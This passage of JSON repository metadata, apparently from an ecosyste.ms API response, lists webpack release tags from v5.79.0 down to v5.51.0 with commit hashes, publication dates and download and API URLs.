v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.